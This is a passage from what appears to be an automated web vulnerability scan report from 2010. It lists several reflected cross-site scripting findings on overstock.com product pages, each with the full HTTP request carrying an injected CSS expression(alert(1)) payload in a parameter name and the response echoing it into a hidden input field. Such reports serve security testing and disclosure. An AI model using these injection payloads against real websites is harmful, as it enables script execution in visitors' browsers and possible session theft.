Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:08:06 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:08:06 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:08:06 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4124237|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:08:06 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405286476:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=2
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109807

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Sh
...[SNIP]...
<input type="hidden" name="bcafa"style="x:expression(alert(1))"f0fceb1f023" value="1"/>
...[SNIP]...

2.90. http://www.overstock.com/Crafts-Sewing/Silhouette-SD-Digital-Craft-Cutter-with-10-Gift-Card/4400810/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Silhouette-SD-Digital-Craft-Cutter-with-10-Gift-Card/4400810/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b09c"style%3d"x%3aexpression(alert(1))"053e4984f6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8b09c"style="x:expression(alert(1))"053e4984f6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Crafts-Sewing/Silhouette-SD-Digital-Craft-Cutter-with-10-Gift-Card/4400810/product.html?8b09c"style%3d"x%3aexpression(alert(1))"053e4984f6d=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:07:16 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:07:16 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289405236211:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:07:16 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4400810|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:07:16 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Si
...[SNIP]...
<input type="hidden" name="8b09c"style="x:expression(alert(1))"053e4984f6d" value="1"/>
...[SNIP]...

2.91. http://www.overstock.com/Crafts-Sewing/Singer-Hand-held-Sewing-Machine/3128187/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Singer-Hand-held-Sewing-Machine/3128187/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db747"style%3d"x%3aexpression(alert(1))"fa26a77673c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db747"style="x:expression(alert(1))"fa26a77673c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Crafts-Sewing/Singer-Hand-held-Sewing-Machine/3128187/product.html?db747"style%3d"x%3aexpression(alert(1))"fa26a77673c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:05:16 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:05:16 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:16 GMT; Path=/
Set-Cookie: mxcproclicks=3128187|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:16 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405116027:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107524

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Si
...[SNIP]...
<input type="hidden" name="db747"style="x:expression(alert(1))"fa26a77673c" value="1"/>
...[SNIP]...

2.92. http://www.overstock.com/Crafts-Sewing/Sizzix-Big-Shot-Machine-with-BONUS-Embossing-Folder/4094572/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Sizzix-Big-Shot-Machine-with-BONUS-Embossing-Folder/4094572/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54724"style%3d"x%3aexpression(alert(1))"ad7d85b7c28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54724"style="x:expression(alert(1))"ad7d85b7c28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Crafts-Sewing/Sizzix-Big-Shot-Machine-with-BONUS-Embossing-Folder/4094572/product.html?54724"style%3d"x%3aexpression(alert(1))"ad7d85b7c28=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:05:48 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:05:48 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4094572|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:48 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405148156:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:48 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111290

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Si
...[SNIP]...
<input type="hidden" name="54724"style="x:expression(alert(1))"ad7d85b7c28" value="1"/>
...[SNIP]...

2.93. http://www.overstock.com/Electronics/50-foot-CAT5E-CAT5-Network-Ethernet-Cable/2541154/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/50-foot-CAT5E-CAT5-Network-Ethernet-Cable/2541154/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c59"style%3d"x%3aexpression(alert(1))"b06869b35b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8c59"style="x:expression(alert(1))"b06869b35b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Electronics/50-foot-CAT5E-CAT5-Network-Ethernet-Cable/2541154/product.html?b8c59"style%3d"x%3aexpression(alert(1))"b06869b35b8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:34 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:34 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408314051:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2541154|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:34 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:34 GMT; Path=/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111176

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>50
...[SNIP]...
<input type="hidden" name="b8c59"style="x:expression(alert(1))"b06869b35b8" value="1"/>
...[SNIP]...

2.94. http://www.overstock.com/Electronics/Black-6.5-foot-HDMI-HDMI-Cables-Set-of-2/2276116/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Black-6.5-foot-HDMI-HDMI-Cables-Set-of-2/2276116/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc708"style%3d"x%3aexpression(alert(1))"e660e51f89c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc708"style="x:expression(alert(1))"e660e51f89c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Electronics/Black-6.5-foot-HDMI-HDMI-Cables-Set-of-2/2276116/product.html?bc708"style%3d"x%3aexpression(alert(1))"e660e51f89c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:30 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:30 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: mxcproclicks=2276116|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408310360:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107100

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="bc708"style="x:expression(alert(1))"e660e51f89c" value="1"/>
...[SNIP]...

2.95. http://www.overstock.com/Electronics/Eforcity-Black-2-port-USB-Car-Charger-w-LED-Light/4512322/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Eforcity-Black-2-port-USB-Car-Charger-w-LED-Light/4512322/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ec2"style%3d"x%3aexpression(alert(1))"fe49622d448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0ec2"style="x:expression(alert(1))"fe49622d448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Eforcity-Black-2-port-USB-Car-Charger-w-LED-Light/4512322/product.html?a0ec2"style%3d"x%3aexpression(alert(1))"fe49622d448=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:29 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:29 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408309221:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4512322|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:29 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:29 GMT; Path=/
Keep-Alive: timeout=5, max=38
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114522

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Ef
...[SNIP]...
<input type="hidden" name="a0ec2"style="x:expression(alert(1))"fe49622d448" value="1"/>
...[SNIP]...

2.96. http://www.overstock.com/Electronics/Leather-Case-and-Protective-Kit-for-iPod-iTouch/4155506/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Leather-Case-and-Protective-Kit-for-iPod-iTouch/4155506/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4266b"style%3d"x%3aexpression(alert(1))"26c79062f8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4266b"style="x:expression(alert(1))"26c79062f8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Leather-Case-and-Protective-Kit-for-iPod-iTouch/4155506/product.html?4266b"style%3d"x%3aexpression(alert(1))"26c79062f8c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:13 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:13 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4155506|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:13 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408293335:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
